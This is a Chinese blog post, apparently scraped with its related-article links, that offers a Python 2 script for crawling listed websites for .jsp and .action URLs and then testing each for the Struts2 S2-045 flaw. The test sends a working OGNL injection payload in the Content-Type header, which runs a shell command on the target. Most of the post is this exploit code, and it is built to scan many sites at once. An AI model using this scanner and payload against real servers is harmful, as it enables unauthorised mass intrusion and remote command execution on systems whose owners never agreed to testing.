【Python】批量爬取网站URL测试Struts2-045漏洞

1、概述都懒得写了。。。。

就是批量测试用的，什么工具里扣出来的POC，然后根据自己的理解写了个爬网站首页URL的代码。。。



#!/usr/bin/env python

# -*- coding: utf-8 -*-

import requests

import random

import httplib

import re

import os

import sys

#########################

##  作者：zzzzzhhhhhhh

##  Code功能

##    1、批量获取指定网站的URL

##    2、批量验证Struts2-045漏洞

##    BUG：121个左右根据网络状况会报错，清除已测试过的网址再测试就没啥问题。懵逼

###########################

# 出现ChunkedEncodingError问题，更改为HTTP 1.0

httplib.HTTPConnection._http_vsn = 10

httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'

# 存放内容

http_URL = []

http_website  = []

# 增加HTTP头部

def add_http(url):

    if "http://" not in url:

        url = 'http://' + url

    return url

# 爬行首页URL

def curl_Site_URL(url):

    url = add_http(url)

    website = url  # 存储一下域名，路径碰路径

    # 获取网页内容

    try:

        r = requests.get(url)

    except requests.RequestException as e:

        print "error website:"+url

        return False

    data = r.text

    # 利用正则查找所有连接

    link_list = re.findall(r"(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')", data)

    for url in link_list:

        filename = os.path.basename(url)  # 取出文件名

        (shotname, extension) = os.path.splitext(filename)  # 取出文件后缀

        if ((extension == ".jsp") or (extension == ".action")):  # 指定后缀检测

            if 'http://' not in url:  # 检测是否有HTTP://

                url = website + url

                http_URL.append(url)    # 读取到列表里或者写入文件中

            else:

                http_URL.append(url)

## 2、验证Stuts2漏洞

def poc(url):

    url = add_http(url)

    try:

        a = random.randint(10000000, 20000000)

        b = random.randint(10000000, 20000000)

        c = a + b

        win = 'set /a ' + str(a) + ' + ' + str(b)

        linux = 'expr ' + str(a) + ' + ' + str(b)

        header = dict()

        header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

        header["Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + win + "'):(#cmd='" + linux + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

        r = requests.post(url, headers=header, timeout=5)

        if str(c) in r.text:

            return '[S2-045 vul]'+url

        else:

            return False

    except Exception:

        return False

# 读取文件函数

def read_file(file_path):

    # 判断文件路径是否存在，如果不存在直接退出，否则读取文件内容

    if not os.path.exists(file_path):

        print 'Please confirm correct filepath !'

        sys.exit(0)

    else:

        with open(file_path, 'r') as source:

            for line in source:

                http_website.append(line.rstrip('\r\n').rstrip('\n'))

    # 批量读取

    sum = 0

    for website in http_website:

        print website

        curl_Site_URL(website)

    # 批量验证

    for d in http_URL:

        result = poc(d)

        if result != False:

            print result

if __name__ == '__main__':

    file_str=raw_input('Input file IP.txt filepath eg:D:\\\\test.txt \n')

    read_file(file_str)

    ## C:\\Users\\AT\\Desktop\\domain.txt

代码特效

txt里保存网站地址就可以了，爬虫还需要后续学习优化、添加功能。。。

【Python】批量爬取网站URL测试Struts2-045漏洞的更多相关文章

python 实现爬取网站下所有URL
python3 实现爬取网站下所有URL 获取首页元素信息: 首页的URL链接获取: 遍历第一次返回的结果: 递归循环遍历: 全部代码如下: 小结: python3.6 requests && ...
从0实现python批量爬取p站插画
一.本文编写缘由很久没有写过爬虫,已经忘得差不多了.以爬取p站图片为着手点,进行爬虫复习与实践. 欢迎学习Python的小伙伴可以加我扣群86七06七945,大家一起学习讨论二.获取网页源码爬取 ...
用Python定时爬取网站最新资源
记录一下. 写做个网站,爬了另一个网站的内容来做自己网站的内容. 把脚本挂到服务器,每隔一个小时去爬一次资源,然后保存到一个HTML文件里. 用flask做web对接,当有请求的时候就返回那个HTML ...
Python：爬取网站图片并保存至本地
Python:爬取网页图片并保存至本地 python3爬取网页中的图片到本地的过程如下: 1.爬取网页 2.获取图片地址 3.爬取图片内容并保存到本地实例:爬取百度贴吧首页图片. 代码如下: imp ...
Python脚本爬取网站美女照片
上次无意之中看到一个网站,里面全是美女的照片,我就心想,哪天有时间了得把这网站的所有美女照片都得爬下来.今天有时间,写了点代码,爬去了网站的所有照片.附上战果!图片实在是太多了,爬半个多小时先附上所 ...
python 批量爬取四级成绩单
使用本文爬取成绩大致有几个步骤:1.提取表格(或其他格式文件——含有姓名,身份证等信息)中的数据,为进行准考证爬取做准备.2.下载准考证文件并提取出准考证和姓名信息.3.根据得到信息进行数据分析和存储 ...
用Python批量爬取优质ip代理
前言有时候爬的次数太多时ip容易被禁,所以需要ip代理的帮助.今天爬的思路是:到云代理获取大量ip代理,逐个检测,将超时不可用的代理排除,留下优质的ip代理. 一.爬虫分析首先看看今天要爬取的网址 ...
python批量爬取动漫免费看！！
实现效果运行环境 IDE VS2019 Python3.7 Chrome.ChromeDriver Chrome和ChromeDriver的版本需要相互对应先上代码,代码非常简短,包含空行也才50 ...
Python批量爬取谷歌原图，2021年最新可用版
文章目录前言一.环境配置 1.安装selenium 2.使用正确的谷歌浏览器驱动二.使用步骤 1.加载chromedriver.exe 2.设置是否开启可视化界面 3.输入关键词.下载图片数.图 ...

随机推荐

自学Linux Shell12.8-循环实例
点击返回自学Linux命令行与Shell脚本之路 12.8-循环实例待定. 3 fi bash shell的if语句会运行if后面的那个命令. 如果该命令的退出状态码是0 (该命令成功运行),位于 ...
Java 关键字final的一小结
* final类不能被继承,没有子类,final类中的方法默认是final的. * final方法不能被子类的方法覆盖,但可以别继承 (方法) * final 成员变量表示常量,只能被赋值一 ...
[hgoi#2019/2/16t1]math
题目描述解法我们稍微枚举一下前面几位,可以得到这样的规律. \[X_i=\frac{1}{2^{i+1}-1}\] \[Y_i=\frac{1}{2^{2^i}-1}\] 那么要使\(xm=yn\ ...
洛谷 P2466 Sue的小球解题报告
P2466 [SDOI2008]Sue的小球题目描述 Sue和Sandy最近迷上了一个电脑游戏,这个游戏的故事发在美丽神秘并且充满刺激的大海上,Sue有一支轻便小巧的小船.然而,Sue的目标并不是当 ...
luogu2024 食物链 (并查集)
把一个点拆成三个,分别对应它的同类.它的猎物和它的天敌,这样的话(以下的相等都是并查集意义上的): 如果令a,b同类,那么a的猎物不能是b的同类,a的天敌不能是b的同类如果令a吃b,那么a的同类不能 ...
Spark 集成开发
WordCount.py # coding:utf-8 from pyspark import SparkContext from pyspark import SparkConf def SetLo ...
luogu P4198 楼房重建——线段树
题目大意: 小A在平面上(0,0)点的位置,第i栋楼房可以用一条连接(i,0)和(i,Hi)的线段表示,其中Hi为第i栋楼房的高度.如果这栋楼房上任何一个高度大于0的点与(0,0)的连线没有与之前的线 ...
CF1080
emmmm......ouuan大佬上紫了,我却没打...... 首先吐槽一波家长会和机房锁门,害我只能来打虚拟赛. 写了abcd四题,还是被ouuan大佬吊打....... 264名,应该能上分吧. ...
A1084. Broken Keyboard
On a broken keyboard, some of the keys are worn out. So when you type some sentences, the characters ...
函数式编程（九）——map,filter,reduce
编程方法论: 面向过程:按照一个固定的流程去模拟解决问题的流程函数式:编程语言定义的函数 + 数学意义的函数 y = 2*x + 1 函数用编程语言实现 def fun(x): return 2*x ...

【Python】批量爬取网站URL测试Struts2-045漏洞

1、概述都懒得写了。。。。

代码特效

【Python】批量爬取网站URL测试Struts2-045漏洞的更多相关文章

随机推荐

热门专题